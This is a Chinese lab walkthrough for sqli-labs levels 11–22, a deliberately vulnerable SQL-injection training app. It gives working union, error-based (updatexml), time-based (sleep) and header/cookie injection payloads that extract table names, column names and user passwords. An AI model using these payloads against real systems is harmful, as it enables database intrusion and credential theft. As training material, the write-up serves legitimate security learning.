sqli-labs(11-22关)

Less-11

  测试流程

  1.测试注入点

name：admin' and 1=1#
password：随便输入就可以进入
经过测试发现使用单引号能够对其进行闭合。

  2.通过burp抓包进行测试

抓包对post提价的参数进行修改，和普通的注入方式都是一样的。
但是这里需要使前面出现错误就需要让uname=1，因为1在数据库中是没有这个用户的所以就产生错误。

  3.获取数据库下的所有表名

uname=1'union select 1,group_concat(table_name) from information_schema.tables where table_schema="security"#&passwd=admin&submit=Submit
至于如何获取数据库版本，库名字，就不写了，之前的文章都有写过。这关和第五关的拼接是一样的。

  4.获取users下的所有列名

uname=1'union select 1,group_concat(column_name) from information_schema.columns where table_name="users"#&passwd=admin&submit=Submit

  5.获取用户和密码下的值

uname=1'union select group_concat(username),group_concat(password) from users#&passwd=admin&submit=Submit

Less-12

  测试流程

  1.测试注入点

name：admin") and 1=1#
password：随便输入就可以进入
经过测试发现使用双引号和括号能够对其进行闭合。

  注：后续流程和11关一样，只是闭合方式不同。

Less-13

  测试流程

  1.测试注入点

name：admin') and 1=1#
password：随便输入就可以进入
经过测试发现使用单引号和括号能够对其进行闭合。
但是这里不在显示出用户名和密码，所以需要使用盲注。

  2.报错盲注

  (1)测试是否存在报错盲注

uname=admin') and updatexml(1,0x7e,3)#&passwd=weqweq&submit=Submit
通过报错测试发现能够进行注入

  (2)获取数据库名

uname=admin') and updatexml(1,concat(0x7e,database()),3)#&passwd=weqweq&submit=Submit

  (3)获取数据库下的表

uname=admin') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' )),3)#&passwd=weqweq&submit=Submit

  (4)获取表下的列

uname=admin') and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),3)#&passwd=weqweq&submit=Submit
由于是分页需要改变后面的数进行控制输出。

  (5)获取user列下的username值

uname=admin') and updatexml(1,concat(0x7e,(select username from users limit 0,1 )),3)#&passwd=weqweq&submit=Submit
由于是分页需要改变后面的数进行控制输出。

  (6)获取user列下的password值

uname=admin') and updatexml(1,concat(0x7e,(select password from users limit 0,1 )),3)#&passwd=weqweq&submit=Submit

Less-14

  测试流程

  1.测试注入点

name：admin" and 1=1#
password：随便输入就可以进入
经过测试发现使用双引号能够对其进行闭合。

  注：后续测试和第十三关一样，当然也可以使用其他的方式，比如布尔，延迟等。

Less-15

  测试流程

  1.测试注入点

name：admin' and 1=1#
password：随便输入就可以进入
经过测试发现使用单引号能够对其进行闭合。

  2.延迟注入

  (1)猜测数据库名的长度

uname=admin' and if(length(database())=8,sleep(5),1)#&passwd=admin&submit=Submit

  注：后面的延迟注入都是一样的修改一下即可

Less-16

  测试流程

  1.测试注入点

name：admin") and 1=1#
password：随便输入就可以进入
经过测试发现使用双引号和括号能够对其进行闭合。

  注：这关也就变了个闭合方式，布尔盲注，延迟盲注，报错盲注都可以用。

Less-17

  测试流程

  1.测试注入点

name：admin
password：admin'
本关是修改密码，经过测试发现使用单引号能够对其进行闭合。

  注：这关变了个注入点，布尔盲注，延迟盲注，报错盲注都可以用。

Less-18

  测试流程

  1.测试注入点

从源代码了解到对 uname 和 passwd 进行了 check_input()函数的处理，所以我们在输入 uname 和 passwd 上 进行注入是不行的。
Ip 地址我们这里修改不是很方便，但是 useragent 修改较为方便，我们从 useragent 入手 我们利用 live http headers 进行抓包改包
User-Agent: 'and updatexml(1,0x7e,3)and '1'='1
所以我们将user-agent修改成上述的格式，就可以进行注入了。

  注：这关变成了User-Agent头部注入，后续操作可以使用报错来实现

Less-19

  测试流程

  1.测试注入点

这关我们通过抓包发现，虽然有User-Agent的数据，但是不显示，但是却显示了referer，那么我们就修改referer进行注入。
Referer: 'and updatexml(1,0x7e,3) and '1'='1

  注：这关变成了Referer头部注入，后续操作可以使用报错来实现

Less-20

  测试流程

  1.测试注入点

这关是让我们对cookie进行注入，通过修改cookie进行注入。
通过测试是单引号闭合。
Cookie: uname=admin' and updatexml(1,0x7e,3)#

  注：这关对Cookie进行注入，后续操作可以使用报错来实现

Less-21

  测试流程

  1.测试注入点

这关和20关一样也是让我们对cookie进行注入，通过修改cookie进行注入。
通过测试是单引号加括号进行闭合，同时需要使用base64进行加密。
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsMHg3ZSwzKSM=
等同于：
Cookie: uname=admin') and updatexml(1,0x7e,3)#

  注：这关cookle注入，变更了闭合方式，同时对数据进行了加密，后续操作可以使用报错来实现

Less-22

  测试流程

  1.测试注入点

这关和21关一样也是让我们对cookie进行注入，通过修改cookie进行注入。
通过测试是双引号进行闭合，同时需要使用base64进行加密。
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSwweDdlLDMpIw==
等同于：
Cookie: uname=admin" and updatexml(1,0x7e,3)#

  注：这关cookle注入，变更了闭合方式，后续操作可以使用报错来实现

  以上很多都简写了很多的操作，实质上很多的时候只要测通了第一步，后续操作基本上都是一样的。主要就是思考从那个点进行注入。